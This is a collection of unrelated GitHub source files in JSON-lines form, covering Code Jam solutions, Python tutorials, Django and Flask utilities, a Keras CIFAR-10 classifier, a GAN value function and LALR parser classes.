+{"seq_id":"23624996591","text":"'''\r\nCreated on 21.05.2011\r\n\r\n@author: LordB\r\n'''\r\n\r\ninFile = open('A-large.in', 'r')\r\noutFile = open('output_Problem_1_large.txt', 'w')\r\n\r\nnrOfCases = int( inFile.readline() )\r\nstatistics = []\r\nwr = []\r\nowp = []\r\noowp = []\r\n\r\ndef calcWP(i):\r\n games = 0\r\n wins = 0\r\n for c in statistics[i]:\r\n if (c == '1'):\r\n wins += 1\r\n games += 1\r\n elif(c == '0'):\r\n games += 1\r\n\r\n wr[i] = ([wins, games])\r\n\r\ndef calcOWP(i):\r\n average = 0.0\r\n games = 0\r\n counter = 0\r\n for j in wr:\r\n if( counter != i):\r\n if(statistics[i][counter] == '1'):\r\n average += j[0] / (j[1]-1)\r\n games += 1\r\n elif(statistics[i][counter] == '0'):\r\n average += (j[0]-1) / (j[1]-1)\r\n games += 1\r\n counter += 1\r\n owp[i] = average / games\r\n \r\ndef calcOOWP(i):\r\n average = 0.0\r\n nrOfOp = 0\r\n counter = 0\r\n for j in owp:\r\n if(i != counter):\r\n if(statistics[i][counter] != '.'):\r\n nrOfOp += 1\r\n average += j\r\n counter += 1\r\n #print('OOWP: ', (average / nrOfOp) )\r\n oowp[i] = (average / nrOfOp)\r\n\r\nfor caseNr in range(1, nrOfCases+1):\r\n print('Working on #', caseNr)\r\n statistics = []\r\n wr = []\r\n owp = []\r\n oowp = []\r\n \r\n nrOfTeams = int( inFile.readline() )\r\n \r\n for i in range(nrOfTeams):\r\n wr.append([])\r\n owp.append([])\r\n oowp.append([])\r\n \r\n for i in range(nrOfTeams):\r\n tmp = inFile.readline()\r\n list = []\r\n for c in tmp:\r\n list.append(c)\r\n statistics.append(list)\r\n \r\n for i in range(nrOfTeams):\r\n calcWP(i)\r\n for i in range(nrOfTeams):\r\n calcOWP(i)\r\n for i in range(nrOfTeams):\r\n calcOOWP(i)\r\n \r\n outFile.write('Case #{}:\\n'.format(caseNr)) \r\n for i in range(nrOfTeams):\r\n winratio = wr[i][0] / wr[i][1]\r\n rpi = 0.25 * winratio + 0.5 * owp[i] + 0.25 * oowp[i]\r\n print(rpi)\r\n outFile.write( ('{}\\n'.format(rpi)) )\r\n\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_81/322.py","file_name":"322.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71335809794","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 12 14:19:07 2021\n\n@author: user\n\"\"\"\n\n\nx=5\n\nif x==10:\n print('10입니다')\n \nelse:\n print('10이 아님') #else는 if랑 줄이 맞춰져야 함.\n\n\n \n \n\n\nx=10\n\ny=20\n\nif x==10 and y==20:\n print('참')\n \nelse:\n print('거짓')\n\n\n\nif 0 < x < 20:\n print('dddd')\nelse:\n print('x')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kokoko12334/TIL2","sub_path":"python/unit14 else 사용하기.py","file_name":"unit14 else 사용하기.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10300229414","text":"#django 批量导入数据\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"django_shop.settings\")\n\n#django 1.6以下版本不需要写这个\nimport django\ndjango.setup()\n\nfrom goods.models import Goods\nfrom dbtools.data.product_data import row_data #拿取数据\nfrom goods.models import GoodsCategory\n\ndef addGoods():\n for item in row_data:\n name=item['name']\n desc=item['desc']\n if not desc:\n desc=''\n sale_price=float(item['sale_price'].replace('¥','').replace('元',''))\n market_price = float(item['market_price'].replace('¥', '').replace('元', '')) # '¥232元'\n goods_desc = item['goods_desc']\n images = item['images']\n goods_front_image=images[0]\n categorys = item['categorys'] # 分类的路径\n category = GoodsCategory.objects.filter(name=categorys[-1]).first() # 分类\n Goods.objects.create(name=name,\n goods_brief=desc,\n shop_price=sale_price,\n market_price=market_price,\n goods_desc=goods_desc,\n category=category,\n goods_front_image=goods_front_image)\naddGoods()\n","repo_name":"Iamnilaoba/django_shop","sub_path":"dbtools/addGoods.py","file_name":"addGoods.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14082320998","text":"import pandas, geopandas\nfrom enum import Enum\n\nclass DataTypes(Enum):\n Void=0\n GeoShape=1\n Excel=2\n CSV=3\n\ndef locations(which):\n \"\"\"Helper function to locate the different databases I'll look at\"\"\"\n res={\n 'referendum':'/input_data/Referendum.csv',\n 'geodata':'/input_data/GeoShapeCommunes/communes-20220101.shp',\n 'recensement':'/input_data/base-cc-evol-struct-pop-2013/base-cc-evol-struct-pop-2013.xls',\n 'revenus':'/input_data/filo-revenu-pauvrete-menage-2013/filo-revenu-pauvrete-menage-2013.xls',\n 'diplomes':'/input_data/pop-16ans-dipl6817/pop-16ans-dipl6817.xlsx',\n 'diploma_helper':'/input_data/HelperDataframeDiploma.csv'\n }\n return res[which]\n\n\n\ndef diploma_class():\n \"\"\"Converts diploma numbers into the equivalent age at which someone who doesn't double would finish\n Put 6 for people without diplomas\"\"\"\n res = {\n 0: 6, #No diploma\n 1: 11, #CEP\n 2: 14, #BEPC\n 3: 16, #Bac\n 4: 18,\n 5: 21,\n 6: 24\n }\n return res\n\ndef mean_diploma(x,helper_df):\n tot_pop=0.\n tot_diploma=0.\n\n diplomas = helper_df.columns\n for col in diplomas:\n current_diploma=diploma_class()[helper_df[col][\"DIPLÔME\"]]\n current_pop=x[col]\n tot_pop += current_pop\n tot_diploma += current_pop*current_diploma\n\n return tot_diploma/tot_pop\n\n\ndef socio_pro_class():\n res = {\n 'C13_POP15P_CS1': 'Agriculteurs',\n 'C13_POP15P_CS2': 'Artisans/commercants',\n 'C13_POP15P_CS3': 'Cadres',\n 'C13_POP15P_CS4': 'Profs',\n 'C13_POP15P_CS5': 'Employés',\n 'C13_POP15P_CS6': 'Ouvriers',\n 'C13_POP15P_CS7': 'Retraites',\n 'C13_POP15P_CS8': 'Autres'\n }\n return res\n\n\ndef age_class():\n res = {\n '0014': (0,14),\n '1529': (15,29),\n '3044': (29,44),\n '4559': (45,59),\n '6074': (60,74),\n '7589': (75,89),\n '90P': (90,90)\n }\n return res\n\ndef mean_age(x,suffix='P13_POP'):\n tot_pop=0.\n tot_age=0.\n\n for idx,val in age_class().items():\n current_pop = x[suffix+idx]\n age=(val[0]+val[1])/2.\n tot_age += current_pop*age\n tot_pop += current_pop\n\n return tot_age/tot_pop\n","repo_name":"cyrilbecot/StGobain_CaseStudy","sub_path":"data_reader/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36481434580","text":"from pyspark.sql import SparkSession\nfrom utils.logger import Log4j\nfrom pyspark.sql.functions import split, explode\n\nif __name__ == \"__main__\":\n spark = SparkSession.builder\\\n .appName(\"Streaming Word Cound\") \\\n .master(\"local[3]\") \\\n .config(\"spark.streaming.stopGracefullyOnStutdown\", \"true\") \\\n .config(\"spark.sql.shuffle.partitions\", 3) \\\n .getOrCreate()\n\n logger = Log4j(spark)\n line_df = spark.readStream\\\n .format(\"socket\")\\\n .option(\"host\", \"localhost\")\\\n .option(\"port\", 9999)\\\n .load()\n\n logger.info('Streaming Dataframe ' + line_df.schema.simpleString())\n words_df = line_df.selectExpr(\"explode(split(value,' ')) as word\")\n count_df= words_df.groupBy(\"word\").count()\n logger.info('Streaming Dataframe ' + count_df.schema.simpleString())\n\n word_count_df = count_df.writeStream\\\n .format(\"console\")\\\n .option(\"checkpointLocation\", \"chk-point-dir\")\\\n .outputMode(\"complete\")\\\n .start()\n\n logger.info('Listerning to localhost:9999')\n word_count_df.awaitTermination()\n","repo_name":"nileshvarshney/basic_pyspark","sub_path":"structured_streaming/streamingWC/streamingWC.py","file_name":"streamingWC.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10368738336","text":"#import potrzebnych bibliotek\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow import keras\nfrom tensorflow.keras.optimizers import SGD,RMSprop\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Flatten, add, Dense, Dropout\nfrom tensorflow.keras.losses import SparseCategoricalCrossentropy\nfrom tensorflow.keras.layers import Convolution2D, MaxPool2D, BatchNormalization\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nimport numpy as np\n\n#funkcja do rysowania wykresów dla accuracy i funkcji straty\ndef draw_curves(history, key1, ylim1):\n plt.figure(figsize=(12, 4))\n plt.plot(history.history[key1], \"r--\")\n plt.plot(history.history['val_' + key1], \"g--\")\n plt.ylabel(key1)\n plt.xlabel('Epoch')\n plt.ylim(ylim1)\n plt.legend(['train', 'test'], loc='best')\n plt.show()\n\n#wczytanie danych i przygotowanie ich do procesu uczenia\ncifar10 = tf.keras.datasets.cifar10\n(X_train, y_train), (X_val, y_val) = cifar10.load_data()\nX_train, X_test, y_train, y_test = train_test_split(X_train, y_train)\nclass_names = ['samolot', 'samochód', 'ptak', 'kot', 'jeleń',\n 'pies', 'żaba', 'koń', 'statek', 'ciężarówka']\n\n#implementacja modelu sieci neuronowej\nmodel = Sequential([\n Convolution2D(filters=128, kernel_size=(5,5), input_shape=(32,32,3), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=128, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n MaxPool2D((2,2)),\n Convolution2D(filters=64, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=64, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n MaxPool2D((2,2)),\n Convolution2D(filters=32, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=32, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n MaxPool2D((2,2)),\n Convolution2D(filters=16, kernel_size=(3,3), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=16, kernel_size=(3,3), activation='relu', padding='same'),\n BatchNormalization(),\n Flatten(),\n Dense(units=32, activation=\"relu\"),\n Dropout(0.15),\n Dense(units=16, activation=\"relu\"),\n Dropout(0.05),\n Dense(units=10, activation=\"softmax\")\n])\n#implementacja otymalizatora, funkcji straty oraz metryki\noptim = RMSprop(lr=0.001)\nmodel.compile(optimizer=optim, loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.summary()\n\n#uczenie przygotowanego przez nas modelu na danych treningowych i walidacyjnych\nhistory = model.fit(\n X_train,\n to_categorical(y_train),\n epochs=80,\n validation_split=0.15,\n verbose=1\n)\n#sprawdzenie skuteczności wytrenowanego algorytmu na danych testowych\neval = model.evaluate(X_test, to_categorical(y_test))\neval\n\n#wywołanie funkcji do rysowania wykresu dokładności względem epok\ndraw_curves(history, key1='accuracy',ylim1=(0.7, 1.00))\n\n#wywołanie funkcji do rysowania wykresu funkcji straty względem epok\ndraw_curves(history, key1='loss',ylim1=(0.00, 2.50))\n\n#wizualizacja filtrów\nfor layer in model.layers:\n if 'conv' in layer.name:\n 
weights, bias= layer.get_weights()\n f_min, f_max = weights.min(), weights.max()\n filters = (weights - f_min) / (f_max - f_min)\n print(layer.name, filters.shape)\n filter_cnt=1\n for i in range(filters.shape[3]):\n filt=filters[:,:,:, i]\n for j in range(filters.shape[0]):\n ax= plt.subplot(filters.shape[3], filters.shape[0], filter_cnt )\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(filt[:, j])\n filter_cnt+=1\n plt.show()\n\n#wizualizacja map cech\nimg_path='C:/Users/natal/Desktop/plane.jpg'\nsuccessive_outputs = [layer.output for layer in model.layers[1:]]\nvisualization_model = tf.keras.models.Model(inputs = model.input, outputs = successive_outputs)\nimg = load_img(img_path, target_size=(32, 32))\nx = img_to_array(img)\nx = x.reshape((1,) + x.shape)\nx /= 255.0\nsuccessive_feature_maps = visualization_model.predict(x)\nlayer_names = [layer.name for layer in model.layers]\nfor layer_name, feature_map in zip(layer_names, successive_feature_maps):\n print(feature_map.shape)\n if len(feature_map.shape) == 4:\n n_features = feature_map.shape[-1]\n size = feature_map.shape[ 1]\n display_grid = np.zeros((size, size * n_features))\n for i in range(n_features):\n x = feature_map[0, :, :, i]\n x -= x.mean()\n x /= x.std ()\n x *= 64\n x += 128\n x = np.clip(x, 0, 255).astype('uint8')\n display_grid[:, i * size : (i + 1) * size] = x\n scale = 20. / n_features\n plt.figure( figsize=(scale * n_features, scale) )\n plt.title ( layer_name )\n plt.grid ( False )\n plt.imshow( display_grid, aspect='auto', cmap='viridis' )","repo_name":"nataliastas/Neural-networks","sub_path":"CNN/uczenie_maszynowe.py","file_name":"uczenie_maszynowe.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"21283424163","text":"\"\"\"\nThis function gets called during every request by the\ncontext processor to return all the custom html for a specific path.\n\"\"\"\nimport re\n\nfrom ecommerce_extensions.tenant.extra_options import check_attributes_required, set_default_option\n\n\ndef process_html(path, options):\n \"\"\"\n Process and loads all the extra html for the template\n rendered during the request.\n\n Parameters:\n path (string): a regex for a url of a given site\n options (dict): a list of separate html separated by a path\n\n Returns:\n dict: a list of separate html scripts validated according to regex in path\n \"\"\"\n html_list = options.get('html', {})\n html_returns = {}\n\n if not isinstance(html_list, dict):\n return html_returns\n\n for regex, values in html_list.items():\n regex_path_match = re.compile(regex)\n if regex_path_match.match(path):\n for html in values:\n set_default_to_html = set_default_option(\n html,\n 'location',\n ['head', 'body_start', 'body_end'],\n 'body_start'\n )\n\n # Validate 'content' key in html\n is_validate_html = check_attributes_required(\n set_default_to_html,\n ['content'],\n \"HTML\"\n )\n\n if is_validate_html:\n html_returns[set_default_to_html['location']] = set_default_to_html['content']\n\n return html_returns\n","repo_name":"eduNEXT/ecommerce-extensions","sub_path":"ecommerce_extensions/tenant/extra_html.py","file_name":"extra_html.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70965636034","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom pygan.gans_value_function import GANsValueFunction\n\n\nclass MiniMax(GANsValueFunction):\n '''\n Value function in GANs framework.\n '''\n\n def compute_discriminator_reward(\n self,\n true_posterior_arr,\n generated_posterior_arr\n ):\n '''\n Compute discriminator's reward.\n\n Args:\n true_posterior_arr: `np.ndarray` of `true` posterior inferenced by the discriminator.\n generated_posterior_arr: `np.ndarray` of `fake` posterior inferenced by the discriminator.\n \n Returns:\n `np.ndarray` of Gradients.\n '''\n grad_arr = np.log(true_posterior_arr + 1e-08) + np.log(1 - generated_posterior_arr + 1e-08)\n return grad_arr\n\n def compute_generator_reward(\n self,\n generated_posterior_arr\n ):\n '''\n Compute generator's reward.\n\n Args:\n generated_posterior_arr: `np.ndarray` of `fake` posterior inferenced by the discriminator.\n \n Returns:\n `np.ndarray` of Gradients.\n '''\n grad_arr = np.log(1 - generated_posterior_arr + 1e-08)\n return grad_arr\n","repo_name":"Flipkickisreal/Hackathon2020Team3","sub_path":"library/accel-brain-code-master/accel-brain-code-master/Generative-Adversarial-Networks/pygan/gansvaluefunction/mini_max.py","file_name":"mini_max.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23543828531","text":"gi=int(input())\r\n#take the test cases\r\nfor gi in range(gi):\r\n #takes the va;ues\r\n xi=input().split()\r\n n=int(xi[1])\r\n f=[]\r\n #initialising the variables\r\n k=0\r\n k=k+1\r\n ij=k%10\r\n c=0\r\n gkl=ij/15\r\n #for loop\r\n for i in range(len(xi[0])):\r\n if(xi[0][i]=='+'):\r\n f.append(1)\r\n gkl=gkl+1\r\n else:\r\n f.append(0)\r\n l=len(f)\r\n ddy=l\r\n #for loop \r\n for i in range(l-n):\r\n if(f[i]==0):\r\n for j in range(i,i+n):\r\n f[j]^=1\r\n c+=1\r\n klm=k%9\r\n i+=n\r\n summ=0\r\n # taking the sum\r\n for i in range(l-n,l):\r\n summ+=f[i]\r\n print('Case',end=' ')\r\n print('#',end='')\r\n print(gi+1,end=': ')\r\n if(klm==k):\r\n k=0\r\n if(summ==n):\r\n print(c)\r\n elif(summ==0):\r\n print(c+1)\r\n else:\r\n print('IMPOSSIBLE')\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2568.py","file_name":"2568.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27971390927","text":"from django.db.models import F, Count\nfrom django.utils import timezone\n\n\ndef thread_post_save(instance, **kwargs):\n from .models import Board\n thread_count = instance.board.threads.count()\n Board.objects.filter(pk=instance.board_id) \\\n .update(thread_count=thread_count)\n\n\ndef post_post_save(instance, **kwargs):\n from .models import Board, Thread, Post\n thread = instance.thread\n thread_post_count = thread.posts.count()\n board_post_count = Post.objects.filter(thread__board=thread.board) \\\n .aggregate(num=Count('pk'))['num']\n Thread.objects.filter(pk=instance.thread_id) \\\n .update(post_count=thread_post_count, updated=timezone.now())\n Board.objects.filter(pk=thread.board_id) \\\n .update(post_count=board_post_count)\n\n\ndef thread_post_delete(instance, **kwargs):\n from .models import Board, Post\n thread_count = instance.board.threads.count()\n post_count = Post.objects.filter(thread__board=instance.board) \\\n .aggregate(num=Count('pk'))['num']\n Board.objects.filter(pk=instance.board_id)\\\n .update(thread_count=thread_count,\n post_count=post_count)\n","repo_name":"julianwachholz/thefarland","sub_path":"apps/boards/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1234870367","text":"import numpy as np\nimport random, time, pylsl\nfrom time import sleep\nfrom pylsl import StreamInfo, StreamOutlet, StreamInlet, resolve_streams\n\ndef main():\n info = StreamInfo('MyMarkerStream', 'Markers', 1, 0, 'string', 'myuidw43536')\n\n streams = pylsl.resolve_streams(wait_time=3.)\n inlet = []\n for stream in streams:\n name = pylsl.StreamInlet(stream).info().name() \n print(name)\n if (name == \"RValues\"):\n inlet = pylsl.StreamInlet(stream)\n\n outlet = StreamOutlet(info)\n\n UP = 'UP'\n DOWN = 'DOWN'\n high = 0.5 #閾値の設定\n low = 0.2\n inlet.open_stream() # バッファ開始\n sleep(.1) # バッファにある程度データをためる\n\n while True:\n # データ取得\n if True:\n d, _ = inlet.pull_chunk(max_samples=1024) # バッファにあるデータを全部取る\n assert(len(d) < 1024) # 念のため、全部取り切れていることを確認する\n try:\n sample = np.array(d)[-1,1] # とってきたデータの最後の部分を使う\n except: # サンプリングレートが落ちてバッファが空になることもあるので...\n pass # その時はpassしてごまかす\n print(sample)\n\n #閾値に応じて文字列を出力\n if(sample > high):\n outlet.push_sample([UP])\n if(sample < low):\n outlet.push_sample([DOWN])\n time.sleep(3)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Waffle1415/LSL","sub_path":"LSL_Android.py","file_name":"LSL_Android.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22802566692","text":"# 创建字典\r\nd1 = {}\r\nd1 = dict()\r\n# 字典的键必须是不可变类型,键不可以修改,不可以重复,但值可以改\r\nd2 = {1:30, 'name':'tom',True:20,1:90}\r\nd1 = dict(a = 1, b = 2)\r\nd1 = dict([(1,2),(3,4)])\r\nprint(type(d1),d1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zhenguo96/test1","sub_path":"Python基础笔记/6/代码/12.创建字典.py","file_name":"12.创建字典.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15629652101","text":"class RuleClass:\n\tdef __init__ (self, id, symbol, production, cursor, lookAheads):\n\t\tself.id = id\n\t\tself.symbol = symbol\n\t\tself.production = production\n\t\tself.cursor = cursor\n\n\t\tif not isinstance(lookAheads, set):\n\t\t\tif isinstance(lookAheads, list):\n\t\t\t\tlookAheads = set(lookAheads)\n\t\t\telse:\n\t\t\t\tlookAheads = set([ lookAheads] )\n\n\t\tself.lookAheads = lookAheads\n\n\tdef __eq__ (self, other):\n\t\tif (isinstance(other, RuleClass)):\n\t\t\tequalSymbol = self.symbol == other.symbol\n\t\t\tequalProd = self.production == other.production\n\t\t\tequalCursor = self.cursor == other.cursor\n\t\t\tequalLookAheads = self.lookAheads == other.lookAheads\n\t\t\treturn equalSymbol and equalProd and equalCursor and equalLookAheads\n\t\telse:\n\t\t\treturn False\n\n\tdef prettyPrint (self, cursor=True):\n\t\t# use a copy to avoid modifying original prodution list\n\t\tprod = self.production.copy()\n\n\t\t# print cursor\n\t\tif cursor:\n\t\t\tif (self.cursor >= len(prod)):\n\t\t\t\tprod.append(\".\")\n\t\t\telse:\n\t\t\t\tprod[self.cursor] = \".\" + prod[self.cursor]\n\n\t\tprod = ''.join(prod)\n\n\t\treturn f\"({self.id}) {self.symbol} -> {prod}\\t\\t{self.lookAheads}\"\n\n\t# returns the production symbol this rule is currently expecting to read\n\tdef expecting (self):\n\t\tif (self.cursor >= len(self.production)):\n\t\t\tpass\n\t\telse:\n\t\t\treturn self.production[self.cursor]\n\n\tdef nextExpected (self):\n\t\tif not self.expecting():\n\t\t\treturn None\n\n\t\tif (self.cursor +1 >= len(self.production)):\n\t\t\treturn None\n\n\t\treturn self.production[self.cursor +1]\n\n\t# returns true if the cursor is at the end of the production\n\t# i.e.: the rule has been recognized\n\tdef hasRecognized (self):\n\t\treturn self.cursor >= len(self.production)\n\n\t# similar is same symbol, same prod and same cursor\n\t# used to detect similar rules when merging lookAheads\n\tdef isSimilarTo (self, other):\n\t\tsameSymbol = self.symbol == other.symbol\n\t\tsameProd = self.production == other.production\n\t\tsameCursor = self.cursor == other.cursor\n\n\t\treturn sameSymbol and sameProd and sameCursor\n\nclass RuleGroupClass:\n\tdef __init__ (self):\n\t\tself.rules = []\n\t\treturn\n\n\tdef __eq__ (self, other):\n\t\tif (isinstance(other, RuleGroupClass)):\n\t\t\tcloneSelf = self.rules.copy()\n\t\t\tcloneOther = other.rules.copy()\n\n\t\t\ttry:\n\t\t\t\tfor c in cloneSelf:\n\t\t\t\t\tindex = cloneOther.index(c)\n\t\t\t\t\tcloneOther.pop(index)\n\t\t\texcept ValueError:\n\t\t\t\treturn False\n\n\t\t\treturn len(cloneOther) == 0\n\t\telse:\n\t\t\treturn False\n\n\tdef addRule (self, rule):\n\t\tif (not isinstance(rule, RuleClass)):\n\t\t\traise TypeError()\n\n\t\tif rule in self.rules:\n\t\t\treturn\n\n\t\tself.rules.append(rule)\n\n\n# class that represents a transition from one state to another\nclass TransitionClass:\n\tdef __init__ (self, symbol, origin, destination):\n\t\tself.symbol = symbol\n\t\tself.origin = origin\n\t\tself.destination = destination\n\n# used by the parser to read input\nclass IterClass:\n\tdef __init__ (self, chain: list):\n\t\tself.chain = chain\n\t\tself.currIndex = 0\n\n\tdef consume (self) -> None:\n\t\tself.currIndex += 1\n\n\tdef current (self) -> str:\n\t\tif self.currIndex >= len(self.chain):\n\t\t\treturn \"EOF\"\n\t\telse:\n\t\t\treturn 
self.chain[self.currIndex]\n","repo_name":"lemoslemos/basic-LALR-1-parser","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"38953165352","text":"from docx import Document\nfrom flask import Flask, request, render_template, current_app\nimport tkinter.filedialog as filedialog\nfrom tkinter import Tk\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n # HTMLフォームを表示するためのテンプレートを返す\n return render_template(\"input_form.html\")\n\n\n@app.route(\"/get_text\", methods=[\"POST\"])\ndef get_text():\n # フォームから入力されたテキストを取得\n doc_number = request.form[\"doc_number\"]\n doc_date_str = request.form[\"doc_date\"]\n doc_date = datetime.strptime(doc_date_str, \"%Y-%m-%d\")\n draft_date_str = request.form[\"draft_date\"]\n draft_date = datetime.strptime(draft_date_str, \"%Y-%m-%d\")\n drafter = request.form[\"drafter\"]\n summary = request.form[\"summary\"]\n authorizere = request.form[\"authorizere\"]\n input_text = request.form[\"input_text\"]\n\n root = Tk()\n root.withdraw() # メインウィンドウを非表示にする\n filepath = filedialog.asksaveasfilename(defaultextension=\".docx\", filetypes=[(\"Word Document\", \"*.docx\")])\n\n # Word文書を生成して保存\n with current_app.app_context():\n generate_docx(filepath, input_text, doc_date, doc_number, draft_date, drafter, summary, authorizere)\n\n # 応答メッセージを返す\n return \"ファイルが保存されました。\"\n\n\ndef convert_to_fullwidth_numbers(text):\n # 半角数字と対応する全角数字の辞書を定義\n halfwidth_numbers = \"0123456789\"\n fullwidth_numbers = \"0123456789\"\n num_conversion = str.maketrans(halfwidth_numbers, fullwidth_numbers)\n\n # 変換を行って返す\n return text.translate(num_conversion)\n\n\n# 全文を改行及び文字数で区切ってリストに入れる\ndef slice_txt_into_list(full_txt, slice_length):\n sliced_list = []\n lines = full_txt.split(\"\\r\\n\") # 改行でテキストを分割\n\n for line in lines:\n while len(line) > slice_length:\n sliced_list.append(line[:slice_length])\n line = line[slice_length:]\n\n if line:\n sliced_list.append(line)\n\n return sliced_list\n\n\ndef generate_docx(output_path, full_txt, date, doc_num, drft_date, drft_person, summary_content, author):\n # 39字ごとに区切ってリストに入れる\n draft_content = slice_txt_into_list(full_txt, 39)\n\n # 決済者によってWordテンプレートを選択して開く\n if author == \"町長\":\n document = Document(\"起案文書様式.docx\")\n elif author == \"副町長\":\n document = Document(\"起案文書様式(副町長まで).docx\")\n else:\n document = Document(\"起案文書様式(課長まで).docx\")\n\n # 文書内の表を取得する\n table = document.tables[0]\n\n # 文書番号欄のセルを取得\n doc_num_cell = table.cell(1, 8)\n\n # 文書番号欄の説に文書番号を入力\n doc_num_cell.text = doc_num\n\n # 文書の日付欄のセルを取得\n date_cell = table.cell(2, 8)\n\n # 文書の日付を和暦に変換&数字を全角に変換\n doc_year_int = int(date.strftime(\"%Y\"))\n\n doc_year = convert_to_fullwidth_numbers(str(doc_year_int - 2018))\n doc_month = convert_to_fullwidth_numbers(date.strftime(\"%m\"))\n doc_day = convert_to_fullwidth_numbers(date.strftime(\"%d\"))\n\n # 文書の日付を和暦に変換\n jpn_doc_date = f\"令和{doc_year}年{doc_month}月{doc_day}日\"\n\n # 文書の日付欄のセルに日付を入力\n date_cell.text = jpn_doc_date\n\n # 起案日&起案者欄のセルを取得\n draft_date_cell = table.cell(3, 2)\n\n # チェック\n # 起案の日付を和暦に変換&数字を全角に変換\n drft_year_int = int(drft_date.strftime(\"%Y\"))\n\n drft_year = convert_to_fullwidth_numbers(str(drft_year_int - 2018))\n drft_month = convert_to_fullwidth_numbers(drft_date.strftime(\"%m\"))\n drft_day = convert_to_fullwidth_numbers(drft_date.strftime(\"%d\"))\n\n # 文書の日付を和暦に変換\n jpn_drft_date = f\"令和{drft_year}年{drft_month}月{drft_day}日\"\n\n # 起案日と起案者を同じセルに入力するため連結\n drafter_date = \"起案 \" + jpn_drft_date + \"\\n\" + \"\\n\" + drft_person\n\n # 起案日&起案者を入力\n draft_date_cell.text = drafter_date\n\n # 摘要欄のセルを取得\n summary_content_cell = table.cell(4, 4)\n\n # 摘要欄に内容を入力\n summary_content_title = 
\"摘要\\n\" + summary_content\n summary_content_cell.text = summary_content_title\n\n # 本文を起案文書様式の6行目から入力\n line_num = 6\n\n for draft in draft_content:\n # 表のline_num行目、0列目にあるセルを取得する\n cell = table.cell(line_num, 0)\n\n for paragraph in cell.paragraphs:\n paragraph.text = paragraph.text.replace(\"\\r\", \"\")\n # セル内のテキストを上書きする\n cell.text = draft\n line_num += 1\n\n # 上書きした文書を保存、保存場所指定\n document.save(output_path)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=8000, debug=True)\n","repo_name":"piezoh/final_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
